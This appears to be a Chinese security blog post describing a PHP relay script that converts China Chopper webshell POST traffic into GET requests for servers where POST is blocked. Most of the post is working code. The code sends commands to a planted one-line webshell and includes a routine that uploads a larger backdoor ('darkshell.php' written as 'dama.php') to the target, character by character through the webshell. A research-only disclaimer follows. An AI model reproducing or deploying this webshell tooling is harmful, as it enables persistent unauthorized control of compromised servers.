有的服务器 管理员脑抽把 POST 方法禁止
而菜刀是利用 POST 来发送执行代码的
只要把 POST 转换成 GET 就可以正常链接了
<?php
ini_set('max_execution_time', '100'); // 超时时间
$url = 'http://127.0.0.1/cmd.php'; // 一句话地址
$pass = 'cmd'; // 密码
$data = $_POST['cmd']; // 中转密码
echo file_get_contents($url.'?'.$pass.'='.$data);
if(isset($_GET['upload'])){
$f = fopen('darkshell.php','r'); // 上传文件
while (!feof($f)){
$content = base64_encode(fgetc($f));
$exec = "file_put_contents('dama.php',base64_decode('$content'),FILE_APPEND);";
file_get_contents($url.'?'.$pass.'='.$exec);
}
echo 'File uploaded successfully';
}
?>
- By:X1r0z[exp10it.cn]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论